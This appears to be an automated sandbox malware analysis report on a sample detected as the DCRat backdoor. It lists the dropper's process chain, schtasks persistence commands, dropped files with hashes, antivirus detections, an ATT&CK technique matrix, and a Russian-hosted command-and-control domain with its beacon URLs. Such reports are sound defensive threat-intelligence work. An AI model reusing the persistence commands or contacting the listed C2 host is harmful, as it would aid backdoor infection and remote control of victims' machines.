            Source: browsersvc.exe, 00000004.00000002.1775639585.000000001C250000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: browsersvc.exe, 00000004.00000002.1775639585.000000001C250000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | API call chain: ExitProcess graph end node graph_0-24472
            Source: C:\chainSurrogate\browsersvc.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A1866F
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1753D mov eax, dword ptr fs:[00000030h] 0_2_00A1753D
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1B710 GetProcessHeap, 0_2_00A1B710
            Source: C:\chainSurrogate\browsersvc.exe | Process token adjusted: Debug
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0F063 SetUnhandledExceptionFilter, 0_2_00A0F063
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00A0F22B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A1866F
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A0EF05
            Source: C:\chainSurrogate\browsersvc.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\chainSurrogate\browsersvc.exe "C:\chainSurrogate\browsersvc.exe"
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0ED5B cpuid 0_2_00A0ED5B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00A0A63C
            Source: C:\chainSurrogate\browsersvc.exe | Queries volume information: C:\chainSurrogate\browsersvc.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Queries volume information: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe VolumeInformation
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00A0D5D4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FACF5 GetVersionExW, 0_2_009FACF5
            Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: browsersvc.exe PID: 6544, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: UAhpvIJrmb.exe PID: 6884, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: browsersvc.exe PID: 6544, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: UAhpvIJrmb.exe PID: 6884, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            1
            Scheduled Task/Job
            11
            Process Injection
            123
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            11
            Scripting
            1
            Scheduled Task/Job
            1
            Disable or Modify Tools
            LSASS Memory121
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing
            DCSync37
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Behavior Graph (ID: 1458153, sample: DFpUKTL6kg.exe, start date: 17/06/2024, architecture: WINDOWS, score: 100). Root signatures: Found malware configuration; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 11 other signatures.
            Process chain recovered from the graph: DFpUKTL6kg.exe (drops C:\chainSurrogate\browsersvc.exe, PE32, and C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe, data) -> wscript.exe (Windows Scripting host queries suspicious COM object (likely to drop second stage)) -> cmd.exe -> browsersvc.exe and conhost.exe.
            browsersvc.exe drops C:\chainSurrogate\UAhpvIJrmb.exe, C:\Windows\L2Schemas\OfficeClickToRun.exe and C:\Recovery\UAhpvIJrmb.exe (all PE32) plus 6 other malicious files (signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures), then starts UAhpvIJrmb.exe, two schtasks.exe instances and 28 other processes.
            UAhpvIJrmb.exe connects to host1871899.hostland.pro (185.26.122.81, ports 49731 -> 80, HOSTLANDRU, Russian Federation).

            Source | Detection | Scanner | Label
            DFpUKTL6kg.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
            DFpUKTL6kg.exe | 59% | Virustotal |
            DFpUKTL6kg.exe | 100% | Avira | VBS/Runner.VPG
            DFpUKTL6kg.exe | 100% | Joe Sandbox ML |
            Source | Detection | Scanner | Label
            C:\chainSurrogate\browsersvc.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe | 100% | Avira | VBS/Runner.VPG
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Windows\L2Schemas\OfficeClickToRun.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Recovery\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\chainSurrogate\browsersvc.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | 100% | Joe Sandbox ML |
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | 100% | Joe Sandbox ML |
            C:\Windows\L2Schemas\OfficeClickToRun.exe | 100% | Joe Sandbox ML |
            C:\Recovery\RuntimeBroker.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | 69% | Virustotal |
            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe | 69% | Virustotal |
            C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | 69% | Virustotal |
            C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe | 69% | Virustotal |
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | 69% | Virustotal |
            C:\Recovery\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\RuntimeBroker.exe | 69% | Virustotal |
            C:\Recovery\UAhpvIJrmb.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\UAhpvIJrmb.exe | 69% | Virustotal |
            C:\Windows\L2Schemas\OfficeClickToRun.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Windows\L2Schemas\OfficeClickToRun.exe | 69% | Virustotal |
            C:\chainSurrogate\UAhpvIJrmb.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\chainSurrogate\UAhpvIJrmb.exe | 69% | Virustotal |
            C:\chainSurrogate\browsersvc.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\chainSurrogate\browsersvc.exe | 69% | Virustotal |
            No Antivirus matches
            Source | Detection | Scanner | Label
            host1871899.hostland.pro | 2% | Virustotal |
            Source | Detection | Scanner | Label
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://host1871899.hostland.pro | 2% | Virustotal |
            http://host1871899.hostland.pro/ | 0% | Avira URL Cloud | safe
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=9 | 0% | Avira URL Cloud | safe
            http://host1871899.hostland.pro/@==gbJBzYuFDT | 0% | Avira URL Cloud | safe
            http://host1871899.hostland.pro | 0% | Avira URL Cloud | safe
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X | 0% | Avira URL Cloud | safe
            http://host1871899.hostland.pro/@==gbJBzYuFDT | 1% | Virustotal |
            http://host1871899.hostland.pro/ | 2% | Virustotal |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            host1871899.hostland.pro | 185.26.122.81 | true | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X | false | Avira URL Cloud: safe | unknown
            http://host1871899.hostland.pro/@==gbJBzYuFDT | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=9 | UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://host1871899.hostland.pro/ | UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
            http://host1871899.hostland.pro | UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | browsersvc.exe, 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            185.26.122.81 | host1871899.hostland.pro | Russian Federation | 62082 | HOSTLANDRU | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1458153
            Start date and time:2024-06-17 06:06:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of new started processes analysed: 42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:DFpUKTL6kg.exe
            renamed because original name is a hash value
            Original Sample Name:23a1767d4e77693bd46f3abfcf10e4d7.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@36/23@1/1
            EGA Information:
            • Successful, ratio: 33.3%
            HCA Information:
            • Successful, ratio: 72%
            • Number of executed functions: 254
            • Number of non-executed functions: 89
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, OfficeClickToRun.exe, RuntimeBroker.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target UAhpvIJrmb.exe, PID 6884 because it is empty
            • Execution Graph export aborted for target browsersvc.exe, PID 6544 because it is empty
            • Not all processes were analyzed; the report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            Time | Type | Description
            00:07:08 | API Interceptor | 5x Sleep call for process: UAhpvIJrmb.exe modified
            05:07:07 | Task Scheduler | Run new task: dllhost path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe"
            05:07:08 | Task Scheduler | Run new task: dllhostd path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe"
            05:07:08 | Task Scheduler | Run new task: OfficeClickToRun path: "C:\Windows\L2Schemas\OfficeClickToRun.exe"
            05:07:08 | Task Scheduler | Run new task: OfficeClickToRunO path: "C:\Windows\L2Schemas\OfficeClickToRun.exe"
            05:07:08 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
            05:07:08 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
            05:07:08 | Task Scheduler | Run new task: UAhpvIJrmb path: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe"
            05:07:08 | Task Scheduler | Run new task: UAhpvIJrmbU path: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe"
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            185.26.122.81 | yk2Eh24FDd.exe | malicious | Unknown |
            185.26.122.81 | hT0xyYJthf.exe | malicious | Unknown |
                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                HOSTLANDRU | http://mydpd.space/ | Get hash | malicious | DCRat, PureLog Stealer | Browse | 185.26.122.30
                  | HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Get hash | malicious | DCRat | Browse | 185.26.122.79
                  | yk2Eh24FDd.exe | Get hash | malicious | Unknown | Browse | 185.26.122.81
                  | hT0xyYJthf.exe | Get hash | malicious | Unknown | Browse | 185.26.122.81
                  | https://hideuri.com/EXWJgm | Get hash | malicious | Unknown | Browse | 185.26.122.79
                  | rwDENO48jg.elf | Get hash | malicious | Mirai, Moobot | Browse | 185.221.215.184
                  | i21878JK11.exe | Get hash | malicious | DCRat | Browse | 185.26.122.80
                  | i21878JK11.exe | Get hash | malicious | DCRat | Browse | 185.26.122.80
                  | Transaccions DOC-REF DX739475.exe | Get hash | malicious | FormBook, GuLoader | Browse | 185.26.122.9
                  | 2D9643297F94E7AF81915ADAA5F1BA01D2809449B1DE2.exe | Get hash | malicious | Azorult | Browse | 185.26.122.8
                No context
                No context
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):41
                Entropy (8bit):4.802554748467756
                Encrypted:false
                SSDEEP:3:4ERz33k3g6nn:4wU3g6nn
                MD5:291639C737510CB6C7D0FA88818E7496
                SHA1:9A905DD7E74E7C336FE94B75B2494AD2EBB115CB
                SHA-256:5515A2F8C55D0C562C224A0774E73646FB9DF0516E7B9EA05081022F03DFA9A0
                SHA-512:179BDC24202C52EA86565E30B4A5CEC11556B76B5DCCE4E0385AB4CD1A4514B04887D9574D089BE691845CA5EE4683082AE16E579A73F55B9991AAB71DFC6596
                Malicious:false
                Preview:49roY0pB3B06jtyrT6yrxPRxHvNi4QpJZaELcoOiC
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (675), with no line terminators
                Category:dropped
                Size (bytes):675
                Entropy (8bit):5.8772691540168065
                Encrypted:false
                SSDEEP:12:EFeI6feu69D/JXpi18upSJ6yAvEur6NmNaZg9TWZPHKVQKW2wqbjYd41wCGxFod:EFhye15hneEusgM9c3w6jE4
                MD5:AFAD523FA4A2A59BA55EAA96E0848C8D
                SHA1:4C48570FFBB93B5805A0CFF610330669D60CB870
                SHA-256:5FEBD46DEB67D947755F35FE1E9C806D3C686A910770DD50BBFF5E143CFA48A9
                SHA-512:185D7DFA638AAA48C940C60F09943C19667D61B4900A527403DD4B64F081271C7FF81FCBC8F29CC3F7084E0BF27999556E5308216657191701EDA3B323DD677E
                Malicious:false
                Preview:18BoTYe96T9ER5u8KJDMbCQ8nUVmQ58p9GtHrWNQI8nwWpuvm5LCxeNzsDA8C1tAVUEKMnRx6xDdZdm8jk9Vt51f24YoWONQPmbBkki9oYFAauZPaBYb1XRZcjSSOnarkwOwCkY9B9rUz1EIeJNV0vY1VBiBRQvA8YanfnNznYa1q7kleKxFZF1yXXbABXrvOqWbaam05XrcVhKYb7gHdpl2glQIMMxPqonAkIKEi6JBXYd0NCjE1kSjEd4zKdotkbvq3JxSwbjgfjeIIZ5JmsYGWD6GNV3ESZb5nw6EPQSZAvDe8wqvieH1CoT0NqFahfNFIjeVc04Va9Fk9bIaoIfxSk28dG0iL11fi8WZSUSrkvaDjs0viovY9Zxiqg2VAVKiIkCBEsIU0xNgJzZuPFAhGcfJLytwc6rPl259qzrzfbiMMQY0GHF4UmcpE30P9W13F74R4ZEaXKBo3T64Z2pU1w58aP4w8b0JjpGOVH6qDohJlxvu65zGrhCTC50ofRb6U2EONsiS58RMPvXmdK0DltcCnxMZQRLvNlztshhOWhKsQ0DQiOLUbYUkZClagJBowf9o6o46nmqEitwxt51CG1UyQOTq6GsNfg6u1ZU4UPrysQBqPxqkR9i5KKXsUN9g4ciCxB6Uk6s1JfFAMnaIaH5g8BkqBmk
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (347), with no line terminators
                Category:dropped
                Size (bytes):347
                Entropy (8bit):5.8440607449843505
                Encrypted:false
                SSDEEP:6:dHowpXRcBW9fKyyC2UZQft4t64Q1DvMxPB8yBSc3RQT2y5tZDPEtd3nLPEHIfcvq:dHtpX6BWMUM4tM1DvMxPa3vRDPwXjEQH
                MD5:37F03B5C6EB1975546F54674841D2EF5
                SHA1:3831F53396AF5960377319B2C10D52E68DE1B663
                SHA-256:3B63804A6F56DA8E937382920AF8E20090DCDD5A5DE007A9BE334E5A3BF176C1
                SHA-512:D4A6610F4D27F54F3DBC766DD8C43A9A5AC24E47DDF14FD9CC3BD84DAD9BEC00F308C1DDD09DAF56C102E7B42BAF045C2ED52A60DE1F2D71BC8F2DE0901B6508
                Malicious:false
                Preview:AAJwQJEldULt4BYKu6ctZ80fOMiKQlKjHzt49dsWCUZASDmwKGXisE5CKnhEl4U2KmmESeKRNGrEizNLjvAJNl0D3rtV5ouI9hzqbhep5GUmX0eUaWez4LojvjKluzWjViFAAhuBRUOHQOpDMZ4iJ5Oy3Q41W25GtvQyvdT3mdij6gTg3HYU4xaaUQHum2oYZHXf71RtFB6pXo1W6X8PekL5U0deVjRuyJKyJyjC0pP21vDqYvxO3Z4z6bKGXwXguL0NeCNIy6YzVSEjxxGkvC0ZPV2rncoDRsIp4zMVioa7AEdnXlTkqwurUb7JKffWSVhmKYp7kuCGm3YL1OTCJDXe7aU
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (310), with no line terminators
                Category:dropped
                Size (bytes):310
                Entropy (8bit):5.783827059265174
                Encrypted:false
                SSDEEP:6:cFlX+JFh3PDpjXy0zcjRT0UyX93otu2M48jARPoF+5b0cV3ZhNQVJ:Myh3rNX/zcVT0fX9gu2znPC+5b00Cj
                MD5:8EF5C5EA43CD247ED455246995372138
                SHA1:904F66F0E9EFA7EC2A15899D9F2D9D499915386A
                SHA-256:9AAD189C955ACAB48C49AC334B1486D73151BC1B2E4A2D6D589B9C7FE137A695
                SHA-512:06B441D0D5001FADC1F93DE2F83A2454FA322BB4830567192ECD19CE0A0C1C7EA8BDFA548B7AA3A74873664E205AC3ACDFA2ECDC3C05DBC0C2193CA7764C31D6
                Malicious:false
                Preview:xJOThrWTc5CoXqajFGuc5AOJRFt4Ts5GoL3w8kI8s6ak1fLnaiqEZpXw5EBc7bAu959Lwolf8vu9jnSw4GeuB1q8yG14iqBQ5ql5g90w7LGn5YNRvPi07QsIOAXqwr6SudD3CXP4Psw0vDDZ3jISHKTp7dqgmK9QOx2cVUPYAnlOd2WL77wNinKjJY5iqtSEtgl7KkEjUtSejFMFGfjoYwrknTS6YqrQVgf6QZAW3N3yUqAELzcLKnq7yAU1RHKnCCICkPyqeMuK33P7SOvjOfGrziIPFIEvCPwSh7e6Avr73fD5vWjDWl
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
